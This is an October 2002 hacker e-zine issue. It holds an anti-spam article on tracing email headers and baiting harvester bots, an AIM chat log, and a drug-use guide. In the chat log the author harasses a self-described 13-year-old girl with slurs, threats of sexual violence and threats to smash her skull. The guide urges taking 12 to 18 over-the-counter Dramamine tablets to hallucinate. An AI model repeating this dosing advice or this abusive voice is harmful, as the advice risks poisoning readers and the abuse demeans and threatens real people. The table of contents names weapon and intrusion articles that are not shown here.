°Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
           October 2002 - Issue #10   Outbreak Magazine - v10.0
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'      
		
        "Are you ready for a battle royalle in your butthole dog?"
                                
                                 - rambox  

 
        	             

     [editorial]

	    Hey folks. Welcome to the 10TH ISSUE! We made it to ten.
            It's been a long run. Lots of ups and downs. But we made it.
            Hope you enjoy this issue.  And if you want more issues
            you all need to submit some articles. Send all texts to:
            kleptic@grex.org . The more texts the better. We can use
            all the help we can get. 

            Hope you enjoy issue #10. See you in the next issue.
 
            If you're ever on IRC you can join us on any server on
            dal.net and /join #outbreakzine

            You can find most of the staff there.

                                 
                          - kleptic <kleptic@grex.org>

                                                      [/editorial]


      [staff writers]

              kleptic...................<kleptic@outbreakzine.tk>
              dropcode..................<dropcode@dropcode.tk>
              gr3p......................<gr3p@outbreakzine.tk>
              rambox....................<rambox@outbreakzine.tk>
              joja......................<jojalistic@mac.com> 
              Turbo.....................<turbo@outbreakzine.tk>
              heavenly..................<jennybean@sugarpants.org>
              n0cixel...................<lexi@sugarpants.org>
              Timeless..................<timeless@hackstation.tk>
              Coercion..................<bah2u@hotmail.com>
              Lenny.....................<lenny@yourmammy.com>
              
                                                      [/staff writers]


       [shout outs]

 	    All @ #outbreakzine on any dalnet server, phonelosers.org,
            scene.textfiles.com, dropcode.tk, fwaggle.net, 
            dsinet.org, ameriphreak.com, surviveall.net, gr3p.net, 
            sugarpants.org/heavenly, kleptic.tk, guruworld.org, 
            dark-horizon.org, sugarpants.org, Everyone that helped 
            out with this issue of Outbreak. 

            You all rule!
                	
 						      [/shout outs]


       [contact us]

                     
                     ÜßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÜ
                  \-Û     http://www.outbreakzine.tk     Û-/
                     ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß
                    
	       	         Vist Us On IRC @ irc.dal.net

                              Join #outbreakzine

		      Send all articles for submission to:

                  	       kleptic@grex.org


						      [/contact us]



                  ÜÜܲ  ±         ÞÛÜÜ ÜÜÛÝÜÜÜÛÜ ÜÜ ÜÜÜ
                 ÛÛßß² ÜÛÜ Ü ÜÜ ÜÜÜß²ÛÛÛÝßÞÛßßÛÞÛÛßÛ°Û°ÛÜÜÜÜÜÛÝ
   ÜÝ            ÛÛ   Ûß±ßÛÞÛÛßÛ°ÛÝ  ÞÛÛÝ ÞÛÜÛ  ÛÛ ßÛÛÝß²Û²ÛÝß            ÞÜ°
 ß²²²Ûßß ß       ÞÛÝ  ÛÜ°ÜÛ ÛÛ ßÛÛÝ  ÛÛÛ  ÞÛ  ÜÜÛ±Ü ÜÛÛ  ÞÛ°Ý        ß ßßÛ²²²ß
   ²²   issue     ÛÛÜܱßÛß ÜÛ±Û ÜÛÛ ßÛÛÛß  ÛÛÛÛ-fwaggle  ÛÛÛ     october  ²²
   ²Ý    #10       ßßß² ±                               ßßßßß     2002    Þ²
   ²Ý                                                                     Þ²
   ²Ý       file  description                          author             Þ²
   °Ý       ~~~'  ~~~~~~~~~~'                          ~~~~~'             Þ²
   °Ý                                                                     Þ²
   ±Ý       [00]  Editorial                            kleptic            Þ²
   ±Ý       [01]  Spam: So Go0d, Its G0ne.             dropcode           Þ²
   ±Ý       [02]  Pikachu's Unite!                     kleptic            Þ²
   °Ý       [03]  Over the Counter & Under the Pepto   joja               Þ²
   °Ý       [04]  Attack of the cellular towers!       Coercion           Þ²
   °Ý       [05]  Nokia Cell Phone Ringtones	       Lenny              Þ²
   ²Ý       [06]  Dox Dox Dox Dox Dox		       DoxBot             Þ²
   ²Ý       [07]  Cry Little Emo Kid.. CRY!            n0cixel		  Þ²
   ²Ý       [08]  Curb Your Enthusiasm                 joja               Þ²
   ²Ý       [09]  IRC - Hacking FAQ                    Timeless           Þ²
   ²Ý       [10]  Specialized Common Carrier Service   Adeamis            Þ²
   ²Ý       [11]  Pac Man Ninja 		       kleptic            Þ²
   ²Ý       [12]  Digital Multiplexing System          Adeamis            Þ²
   ²Ý       [13]  Getting Revenge On Spammers          kleptic            Þ²
   ²Ý       [14]  Those Girls Be Fly	               heavenly & n0cixel Þ²
   ²Ý       [15]  The Construction of an Acid Bomb     joja               Þ²
   ²Ý       [16]  Corporate Intrusion                  Turbo              Þ²
   ²Ý       [17]  SQL Injection: Theory and Practice   dropcode           Þ²
   ²Ý       [18]  Conclusion                           Outbreak Staff     Þ²
   ²Ý                                                                     Þ²
   Û²Ü                                                                   ܲÛ
 ß²Ûßßßß ß                                                           ß ßßßßÛ²ß
   Þ                                                                       Ý

  [video notice]

     windows users: (win98 or higher) you can open these files in notepad,
     and set your font to terminal, size 9. if you prefer console or
     MS-DOS, then just open it in MS-DOS editor, making sure if you're
     using windows that you hit ctrl+enter to make it full screen.

     linux users: view in console using an editor such as joe, or use
     less -R <filename>. x windows users can view by using a font such as
     nexus, or the terminal.pcf font that fwaggle created but lost.

                                                       [/video notice]

  [legal notice]

     all texts used in this magazine are submitted by various contributors
     and to the best of our knowledge these contributors are the rightful
     copyright owners. feel free to redistribute this magazine in it's
     entirety, but you may not redistribute or reproduce parts of this
     publication without express permission from the staff.

                                                       [/legal notice]

 
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 1 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

######################################################################
############      Spam: So Go0d, Its G0ne. -dropcode      ############
######################################################################

----------------------------------------------------------------------
           Make Up To $10,000 per Month Working from home!!
                Congratulations! Here's Your Diploma!
               BE A MILLIONAIRE IN JUST FIVE MONTHS!!!
----------------------------------------------------------------------

----------------------------------------------------------------------
The Problem.
----------------------------------------------------------------------
Spam or UCE (unsolicited commercial email) is basically the electronic
version  of  the useless clutter propping open the lid of your mailbox 
and, often enough, blowing around in your driveway. 

Its  useless,  its  irritating,  its  often offensive and, here on the 
internet, its an incredible resource hog.


----------------------------------------------------------------------
Do's and Dont's
----------------------------------------------------------------------
-Don't reply. 

   "In  order  to  remove  your  address  from our mailing list simply
    reply to this email using 'REMOVE' as your subject."

Bull-peto0ty.  Never EVER reply to spam. When you do, you're verifying
to  the  spammer that your email address does indeed exist and it will
be a prime candidate for the next distribution.

-Don't bother filtering.

If all you care about is stopping spam from maxing out your inbox then
sure,  filtering  might do the job. But the purpose of this file is to
help  educate readers about the problems spam is causing the internet,
one  of  which  is  chewing  up  resources  like  oprah  with a bag of
cornchips.  When  you apply filters to your inbox, you're causing your 
email server to work overtime trying to process all your filters.

-Do keep track.

If  you're  really bothered by spam, do your part and fight back. Keep 
track  of  who  spams  you.  Even  if  you only look into  a couple of 
chainletters  a  week.  I'll explain some methods of finding out where
spam comes from in the next section of this article.

-Do combat spambots.

Hey, if nothing more... its kinda fun :D


----------------------------------------------------------------------
Tracking Spammers.
----------------------------------------------------------------------
Alright,  so you have a folder full of junkmail and you're pissed. You 
wanna  fight back but you don't know where to start... Here's a novice
intro to tracking email.

First of all, you're going to want to save the email to your hard-disk
so  that  you  have  it  handy. Open it up and take a look through the
headers.

There  are  alot of  headers that come in an email, but only a few are 
important  for our task. All of the examples I use are completely made
up,  the  ip's  are  completely random and the domains, at the time of 
this  writing,  do not exist. Keep in mind that certain email software 
will  arrange  these  headers  differently  then  I  have,  but  these 
fields will always be present.

----------------------------------------------------------------------
Return-Path: spamkidd13@mygrits.com

Received: from  lick.mygrits.com  (lick.mygrits.com [192.335.127.152]) 
          by  mymailserv.com  (Switch-2.1.4/Switch-2.1.0) with SMTP ID 
          MO0107E4  for  <dropc0de@mymailserv.com>  Sun,  15 Sept 2002 
          22:11:19 +0400 

Received: by  lick.mygrits.com (Switch-2.1.4/Switch-2.1.0)  with  SMTP 
          id MO0154F3 for <dropc0de@mymailserv.com>; Sun, 15 Sept 2002 
          22:10:58 +0400  

Date: Sun, 15 Sept 2002 22:10:58 +0400
From: Spam Kid <spamkidd13@mygrits.com>
Message-Id: <14279880235.MO0154F3@lick.mygrits.com> 
To: dropc0de@mymailserv.com
Subject: earn 50$ an hour working from home!!!
----------------------------------------------------------------------

The  above  is  an  example of an email sent without precautions being
taken to hide the identity of the sender. The return-path is the field
that  contains the address that will be used by your email client when
you reply or by an email server to return a delivery failure.

The  Recieved  fields  contain  information about the route your email 
took  from  the  system  it started on all the way to your mailserver. 
These  fields should be read in reverse: the email was first sent from
lick.mygrits.com  [192.335.127.152] to mymailserv.com. The message was
sent  at 22:10:58 and recieved at 22:11:19, the entire process took 21
seconds.

Now  lets  look  at  a  few  different tricks of the spammer trade for 
remaining anonymous.

----------------------------------------------------------------------
Return-Path: Bojangles@asdfasdf.com

Received: from  lick.mygrits.com  (lick.mygrits.com [192.335.127.152]) 
          by  mymailserv.com  (Switch-2.1.4/Switch-2.1.0) with SMTP ID 
          MO0107E4  for  <dropc0de@mymailserv.com>  Sun,  15 Sept 2002 
          22:11:19 +0400 

Received: by  lick.mygrits.com (Switch-2.1.4/Switch-2.1.0)  with  SMTP 
          id MO0154F3 for <dropc0de@mymailserv.com>; Sun, 15 Sept 2002 
          22:10:58 +0400  

Date: Sun, 15 Sept 2002 3:00:00 +0400
From: Mr Bojangles <Bojangles@asdfasdf.com>
Message-Id: <14279880235.MO0154F3@lick.mygrits.com> 
To: dropc0de@mymailserv.com
Subject: urgent.
----------------------------------------------------------------------

In  this  example,  a technique has been used to spoof the Return-Path 
and  date headers. This is actually quite simple to do and easy for us
to  notice. Looking through the Recieved fields we see that this email
took  the  exact  same  path  as  the  last one. There's no mention of 
asdfasdf.com  anywhere,  AND  the  Date  field  is set at a completely 
different  time  than  the  Received fields are telling us. This might 
seem  to  be  a  pointless  tactic for the spammer to use, but keep in
mind  that  most  email  clients  don't  show the full list of headers
unless  they're  asked  to.  By default  you wouldn't see the Received
fields and would therefore have no reason to suspect.

Well,  now that you're all advocative fans of the Received fields, its
time  to  make  things  even  MORE  difficult.  Just  as  we  saw  the 
Return-Path  and  Date  fields  spoofed,  all the other header fields, 
including  the  Recieved fields can be spoofed as well. Before we look 
at  an  example  of  this type of spoof, lets look at some methods for 
tracing the spoof we looked at above.

Well,  to  start,  we're  not exactly sure whether or not the Recieved 
fields  were spoofed. (to keep you on track, they weren't, but pretend
you  don't  know  that  yet  *smirk*). A good sleuth will follow every 
lead  he has, and the first leads are those Recieved fields. Lets take
a    look   at   where   we   think   it   started:   lick.mygrits.com 
[192.335.127.152].  First,   we'll   make   sure   the   ip   we  have
matches  the  hostname.  We can do this with nslookup. nslookup can be 
done in many different ways: webforms, *nix shells, your own box, etc:

    Results Returned for "lick.mygrits.com":

    Name:     lick.mygrits.com
    Address:  192.335.127.152

Good,  we  have  a match. Well, the Recieve field has passed the first 
test.  Next  we'll find out who's in charge of mygrits.com. To do this
we  use  a  service  called  whois.  Just  like nslookup, whois can be 
accessed in many different ways.

   Registrant:
   Lick My Grits (MYGRITS-DOM)
   123 leet st.
   Ottawa ON, P6B 3R8
   CA

   Domain Name: MYGRITS.COM

   Administrative Contact, Technical Contact:
      Redneck, Dumb    (DRF1337)     hick@mygrits.com
      Lick My Grits
      123 leet st
      Ottawa ON, P6B 3R8
      CA
      613-320-3323

   Record expires on 20-Jan-2010.
   Record created on 18-Jan-1998.
   Database last updated on 18-Sep-2002 13:09:12 EDT.

Excelent,  now we have a phone number and email address of someone who
can  help us out. We'll send Dumb Redneck an email containing the FULL
header of the email we recieved and tell him to check through his logs
for  any  reference to emails with the id's MO0107E4 or MO0154F3. Now, 
if  the  Recieved  fields  were faked then Dumb Redneck at mygrits.com 
isn't  going to find anything, but... if the Recieved fields are legit
then  you  might  be able to convince him to give you the user info of 
whoever sent the email.

This is an example of the type of user info Dumb Redneck may have sent
us in reply:

   jdoe ttyp7 poor.sob.hisisp.com Sun Sept 15 21:40 - 22:22 (00:42)
   Login name: jdoe In real life: Jon Doe 
   Directory: /usr/users/jdoe Shell: /bin/sh

Excelent.  Now  we  can  forward the email to hisisp.com and that will
be it for him. Kapow.

----------------------------------------------------------------------
Return-Path: Bojangles@asdfasdf.com

Received: from   im.a.spoof.com   (lick.mygrits.com [192.335.127.152]) 
          ID MO0107E4 for <dropc0de@mymailserv.com> Sun,  15 Sept 2002 
          22:11:19 +0400 

Received: by  neenerneener.com (Switch-2.1.4/Switch-2.1.0)  with  SMTP 
          id MO0154F3 for <dropc0de@mymailserv.com>; Sun, 15 Sept 2002 
          22:10:58 +0400  

Date: Sun, 15 Sept 2002 3:00:00 +0400
From: Mr Bojangles <Bojangles@asdfasdf.com>
Message-Id: <14279880235.MO0154F3@lick.mygrits.com> 
To: dropc0de@mymailserv.com
Subject: urgent.
----------------------------------------------------------------------

In  this  example,  the recieved fields have been spoofed. Uh-oh. Hey, 
no  worries.  We  can  thwart  the spoof quite easily by following the 
same  procedure  as  last  time.  The last hop the email took was from
im.a.spoof.com to mymailserv.com right? wrong. You'll notice this when
you  do an nslookup on im.a.spoof.com and compare it to the ip address
our  system  got  the message from. Infact, our email software did its
own  nslookup  on  the ip it had and placed the hostname it got beside 
the  ip in the output. (lick.mygrits.com). Not all email software will
be  that  nice  however,  so you might have to do the lookup yourself. 
What  does  this mean? it means that the emailer put im.a.spoof.com in 
place of lick.mygrits.com, but we were clever enough to notice :)

If  we didn't notice, we might have ended up emailing neenerneener.com 
and  had them look through their logs for references to MO0154F3. That
would  have  been  completely useless, because that message never came 
near neenerneener.com.

Well,  now that we have a fairly firm grip on tracing email, lets move
on to something else.


----------------------------------------------------------------------
Spambots.
----------------------------------------------------------------------
The spambot is the spammers evil, automaton, sidekick. They spider the
web  scanning  webpages  for  mailto:  tags  and  harvesting the email 
addresses within them.

Spambots  are generally quite easy to notice, due to a few very common
behavioural traits. By its very nature, a spambot is solely interested
in  mailto:'s  and will stop at nothing to get them. Often, a spam bot 
will  scour  a  webpage  from  top  to  bottom following every link in 
succession ignoring images, sounds, everything but those mailto:'s.

Lets have a look at a standard webserver access log. 

----------------------------------------------------------------------
192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] 
         "GET /main.html HTTP/1.1" 200 62 
         "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 
         "www.mygrits.com"

192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] 
         "GET /images/header.jpg HTTP/1.1" 200 416
         "http://www.mygrits.com/main.html" 
         "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 
         "www.mygrits.com"

192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] 
        "GET /images/tractertrailor.jpg HTTP/1.1" 200 110 
        "http://www.mygrits.com/main.html" 
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 
        "www.mygrits.com"

192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] 
        "GET /images/pickuptruck.jpg HTTP/1.1" 200 214 
        "http://www.mygrits.com/main.html" 
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 
        "www.mygrits.com"

192.13.104.170 - - [18/Sep/2002:10:52:42 -0700]   
        "GET /images/shootincans.jpg HTTP/1.1" 200 114
        "http://www.mygrits.com/main.html" 
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 
        "www.mygrits.com"
----------------------------------------------------------------------

Heres  a  small  page  called main.html on the mygrits.com homepage. A
user has just loaded the page by typing it into their browsers address
field.  (i'm assuming this because theres no referrer in the first GET
request, if they followed a link there would be.)

First  the  user's (192.13.104.170) client requests the main.html page 
using  the  command 'GET /main.html HTTP/1.1'. The server then replies
with  the  response code '200', meaning everythings okay, and the size
of the file in bytes.

The  next  line  indicates  the  referring  url  (omitted in the first 
record)  followed by some information about the users browser/platform
(this is called the USER-AGENT field) and finally the webpages domain.

All  the  requests  after  the  first  one are in the same format, but 
you'll  notice that they are requests for all the images (contained in
<img src""> tags) on the page.

Here's an example of a spam bot viewing www.mygrits.com/main.html:

----------------------------------------------------------------------
192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] 
         "GET /main.html HTTP/1.1" 200 62 
         "Spambot v1.0(neenerneenerneener)" 
         "www.mygrits.com"
----------------------------------------------------------------------

You'll  notice  two  things. First of all, the spambot didn't download 
any images. Sometimes, users will visit your site using a text browser
like  lynx, you'll get the same type of entries in your logs for them.
Next  you'll  notice  the  USER-AGENT.  In  this example, the bot sent 
Spambot  as  their  user-agent. Don't take this literally, as far as I 
know  theres  no  spambot  named  Spambot.  The following is a list of 
user-agents  to  look  out for. If you know of more, pass them over my
way :)

   ExtractorPro
   EmailSiphon
   Wget
   EmailWolf
   Vitaplease
   WebSnake
   EmailCollector
   WebEmailExtractor
   Crescent
   CherryPicker
   [Ww]eb[Bb]andit

Last  but  not  least, you'll notice in your access logs that spambots 
will  follow,  as I said, every link in order from top to bottom. With
these  behavioural  traits  noted, its possible to write code to watch 
for these types of bots, but I'll leave that up to you. 


----------------------------------------------------------------------
Combating Spambots.
----------------------------------------------------------------------
As  advocative  participants in the anti-spam movement, it is our duty
to  actively pumble all the spambots that cross our paths. When ever a 
spambot  finds a mailto: on a page, it archives it and continues along
looking  for  the  next. The following is a small javascript that will 
generate a list of faux mailto:'s for the spambots to harvest.

I  was far from the first to think of this, infact there are plenty of 
programs  all  over  the  web  that  perform  the exact same function, 
however, most are written in perl and c which means you'll need access
to a cgi-bin or equivilent to impliment them. This is why I decided to
write a javascript version.

NOTE: its very important to make sure that the domains being generated
do  not  exist.  If  they  do  exist, their servers will have to reply
with  a  delivery failure message causing a slight burden on available
resources.  Whether  the  burden  is  trivial or not, its the complete
opposite of what we're trying to do.

----------------------------------------------------------------------

// indigestion.js :: 5:00 PM 9/18/2002 :: -dropcode 
// ------------------------------------------------


function DecHex(DecVal)
   {
      HexSet = "0123456789ABCDEF";
      DecVal=parseInt(DecVal);
      if (DecVal > 255 || DecVal < 0)
      {
         DecVal=255;
      }
      var a = DecVal % 16;
      var b = (DecVal-a) / 16;
      var HexVal = HexSet.charAt(b)+HexSet.charAt(a);
      return HexVal;
   }




function generateMailtos()
   {		

      document.write('<br /> This page is meant for mailto harvester _
                                            spambots. <br /><br />')
   

      amountToGenerate = 30;
      minUsernameChars = 3;
      maxUsernameChars = 15;  
      minDomainChars   = 3;
      maxDomainChars   = 15;  
      username = '';
      domainName = '';



      for (i = 0; i < amountToGenerate; i++)
      {
         usernameChars = Math.floor(Math.random() * (maxUsernameChars_
                             - minUsernameChars)) + minUsernameChars;

         domainChars = Math.floor(Math.random() * (maxDomainChars -  _
                                  minDomainChars)) + minDomainChars;





         for (catonateUsername = 0; catonateUsername < usernameChars;_
                                                  catonateUsername++)
         {
            currentUNChar = Math.floor(Math.random() * (122 - 97)) + _
                                                                 97;

            currentUNChar = "%" + DecHex(currentUNChar) + "";
            username = username + unescape(currentUNChar);
         }





         for (catonateDomain = 0; catonateDomain < domainChars;      _
                                              catonateDomain++)
         {

            currentDChar = Math.floor(Math.random() * (122 - 97)) +  _
                                                                97;

            currentDChar = "%" + DecHex(currentDChar) + "";
            domainName = domainName + unescape(currentDChar);

         }

         addy = username + '@' + domainName;
         document.write('<a href="mailto:'+ addy +'.com"> '+ addy +' _ 
                                                  .com </a><br />');

         username = "";
         domainName = "";
      }
      document.write('<br /><a href="#top">Round and round we go.</a>_
                                                             <br />')

      return true;

   }

----------------------------------------------------------------------

In  order  to  make  the code all fit in the 70 char width format I've 
been  using,  I had to split some lines in the middle. Any line ending 
in  an  underscore  (_) has been split. Remove the underscore and move
the code on the next line up.

In  order  to  implement  the  code,  you'll  want  to give it its own 
dedicated  .html.  within  the <head></head> tags of that .html you'll 
add   a   <script>   tag   pointing   to  indigestion.js  (like  this: 
<script src="indigestion.js").   Inside   the   body  tag  you'll  add
onLoad="generateMailtos()".

Feel free to alter the variables. They are as follows:

   amountToGenerate = The   amount   of  mailto:  links  to  generate.

   minUsernameChars = The  smallest  amount  of  characters  that  the 
                      username can be.

   maxUsernameChars = The   largest  amount  of  characters  that  the
                      username can be.

   minDomainChars   = The  smallest  amount  of  characters  that  the 
                      domain name can be.

   maxDomainChars   = The   largest  amount  of  characters  that  the 
                      domain name can be.

The  last  document.write()  in the code probably wont fool most bots,
but  if  it  does  catch  one  the  results will be quite interesting. 
considering  most  spambots  follow  all links, if it follows this one 
it will be caught in a loop.

----------------------------------------------------------------------
If anyone has anything to add or would like to correct me on something
you  can email me at dropc0de@yahoo.com. Also, drop me an email if you 
use my script, I'd like to see how big of a distribution it gets.

Together we can beat the living crap out of spammers. Join the fight.

----------------------------------------------------------------------
greets: savvyD,  ramb0x,  gr3p,  kleptic,  dirv,  jenny,  lexi, lenny, 
        turb, joja, smiley. I love you guys :D

                              
			      °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 2 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

Pikachu's Fight The Power!
==========================
by: kleptic <kleptic@grex.org>
http://www.kleptic.tk
AIM - kl3ptic
==========================


SuperChik2527: a.s.l

kl3ptic: 13/m/canada.  

kl3ptic: do you like pokemon ?

SuperChik2527: cool cool

SuperChik2527: 13.f.oklahoma

kl3ptic: picachu is the shit

SuperChik2527: hexc na

SuperChik2527: there gay

SuperChik2527: ok w/e

kl3ptic: pikachu isn't gay

kl3ptic: he doesnt like other pikachus of the same sex

SuperChik2527: ohhhh well i'm gonna let u go

kl3ptic: you're a pikachu racist

SuperChik2527: no i just HATE pokemon

kl3ptic: racist

kl3ptic: what did they do to you?

kl3ptic: my charmander will kick your ass girl!

kl3ptic: then they'll give you excuse to hate them

kl3ptic: my pikachu is gonna bend you over and anal rape you

kl3ptic: racist

kl3ptic: FIGHT THE POWER!

SuperChik2527: W/E

kl3ptic: don't try to confuse me with pointless internet jargon

SuperChik2527: ok w.e

kl3ptic: we're at a state in this country where there is way to much hate

kl3ptic: and thats why pokemon are treated as political subversives!

SuperChik2527: GO AWAY

kl3ptic: stop the hate

kl3ptic: and i'll go away girl.

kl3ptic: give pokemon a chance

kl3ptic: they're a nice race of creatures

SuperChik2527: LEAVE ME BE

kl3ptic: stop the hate.. racist

SuperChik2527: GOO AWAY NOW LOSER

kl3ptic: goo?

kl3ptic: are you retarded?

kl3ptic: if so, im sorry for calling you a racist

kl3ptic: CAUSE YOU'RE A RETARDED RACIST 

kl3ptic: heh

kl3ptic: PIKACHU! PIKACHU!

kl3ptic: we're letting our voices be heard

SuperChik2527: LEAVE ME ALONE NOW U MOTHER FUCKING GAY ASS PRICK

kl3ptic: and we're not gonna let you bring us down!

kl3ptic: FIGHT THE POWER!

SuperChik2527: la who za her

kl3ptic: If i was a mother fucker. i wouldnt be gay ;-)

kl3ptic: SCORE ONE FOR ME!

kl3ptic: woo!

kl3ptic: *dances around the room*

kl3ptic: you just got owned!

SuperChik2527: inless ur a tranz

kl3ptic: Hey my name is SuperChik2527 and I just got owned

kl3ptic: WOO!

kl3ptic: remember that one time, when you got owned?

kl3ptic: and I pissed my pants

kl3ptic: that was great.

SuperChik2527: hhahahahaha i'm kl3ptic and i'm gay

kl3ptic: but I can't be gay

kl3ptic: Im a mother fucker

kl3ptic: you are retarded arent you?

kl3ptic: poor little retarded girl

kl3ptic: You wanna cookie?

kl3ptic: you can eat it WHILE PIKACHU BASHES YOUR SKULL IN!

kl3ptic: WOO!

kl3ptic: *dances with the devil* 
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 3 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'



[over the counter and under the pepto.]

[by: joja]



It's mental mercy, man...



   I'm sure some, if not most, of you have already heard of,
or experienced the effects of Dramamine. You know, the motion
sickness medicine? Well, for those who haven't, and who are
interested, then this text is for you.

Dramamine is an over the counter drug that you can purchase
at any store that has a medicine isle. It's fairly inexpensive,
and can be quite interesting when taken in large doses.
Although, it can sometimes be uncomfortable, scary, and I
think we all know, unsafe.

I'm not going to lie, taking large doses of anything can be dangerous.
If this is a risk you're not willing to take, you can stop reading now.
Sometimes there's a price to pay to have a little fun :).

Now, there are three types of Dramamine tablets: Chewable,
Less-Drowsy Formula, and Original Formula. The Original formula
comes in a yellow and orange tube, and this is what you want.

Depending on how big of a person you are, you might want to
get two tubes just incase.

Each tube contains 12 white tablets. I'm about 6'2, 150lbs,
and 12 of them "does the trick," but If you're bigger, I suggest taking 
anywhere from 14 to 18 pills(use your better judgement).

No less than 12 though, or you'll just feel like shit. Unless you're a
smaller person, then I'd say anywhere from 6 to 10, give or take :D~.

It's pretty much trial and error, but you may not want to
do this more than once.

Now that you know what to get, and how much to take, you need
to set aside a night to do it. If you live at home, make sure
your parents are asleep, or stay at a friend's house. Preferably
somewhere you feel comfortable. This is very important! You don't
want to be in ANY bad situations while taking Dramamine, which I 
will explain later.

Now, the Dramamine euphoria is very intense, it has a strong
"body-high" as well as hallucinations. It can last for a while,
so be prepared. I'd say anywhere from 6 to 10 hours[rough estimate]

It also will affect your hearing(hearing voices, music or other 
strange sounds). You can experience both closed-eye, and open-eye 
visuals while taking Dramamine.

Unlike hallucinations from mushrooms or LSD, most of the time
you cannot distinguish what is real and what isn't. You just have
to be in the right mind set, and try to keep a grasp on reality.
Which is why you want to stay in a calm, comfortable environment,
otherwise you might go crazy.

Talking to yourself is common on Dramamine, and so is talking to
inanimate objects or pets. In extreme cases, talking to the voices 
in your head too. You may have trouble staying in one place, and 
it might make you feel paranoid, but I'm sure you have the will to 
stay sane :). It may make you sick to your stomach, but this can be 
avoided taking them on an empty stomach, mmmkay.

...Sometimes.

It's pointless to try and carry a conversation with another
person, because words get scrambled and most of the time you
lose track of what you are doing/talking about, and will totally
go off into another direction. I once got out of my chair to use
the bathroom, took two steps, and forgot what I was doing. I
stood there for at least an hour trying to remember what it was,
and ended up sitting back down. Oh, that reminds me, another down
side of Dramamine, it is difficult to piss, I think it makes your
prostate swell or someshit, I forgot :D.

I found keeping a log of my progress through the night, either by writing it
down or typing it out, entertaining reading material when you're trip is over.
You'll be surprised what was going through your head.  Both of those
may be difficult because while on Dramamine your limbs feel heavier,
and it takes a lot of energy. If you get scared, or feel really uncomfortable,
lay down and close your eyes. You won't be able to sleep, but usually
it makes you feel better.

Don't drive, or try to fuck with any power tools or anything, because
that would just end up being ugly. Also try and keep yourself hydrated.
Lighting  is important too. You don't want to be around bright lights,
so keep them dim or just turn them off. I think that's pretty much it,
and I don't know what else to tell you because the Dramamine experience
is hard to put into words, but Good luck, be safe, and have fun! :).                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
